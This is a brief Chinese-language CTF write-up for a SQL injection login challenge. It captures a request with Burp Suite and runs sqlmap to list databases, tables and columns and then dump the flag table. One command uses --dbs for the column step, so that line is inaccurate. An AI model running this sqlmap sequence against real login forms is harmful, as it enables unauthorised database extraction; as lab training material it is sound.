根据url提示是让sql注入,但万能密码又无效,这里我们用sqlmap+bp来解题。
首先输入用户密码来登录用bp抓包:
如图将其保存到txt文件中,然后用SQLmap来注入
输入命令暴库:sqlmap.py -r "1.txt" -p admin_name --dbs(我将1.txt和sqlmap保存在同一个文件夹下了)
-p为注入点,就是admin_name ;r为读文件
会发现出来两个数据库,而我们需要的是bugkusql1,
然后暴表:sqlmap.py -r "1.txt" -D bugkusql1 -p admin_name --tables
爆出了flag1表,
然后爆列名:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -p admin_name --dbs
爆出了flag1列
然后爆字段:sqlmap.py -r "1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump
就拿到flag了。
如果你照这个步骤注入失败了,尝试提高level等级进行注入。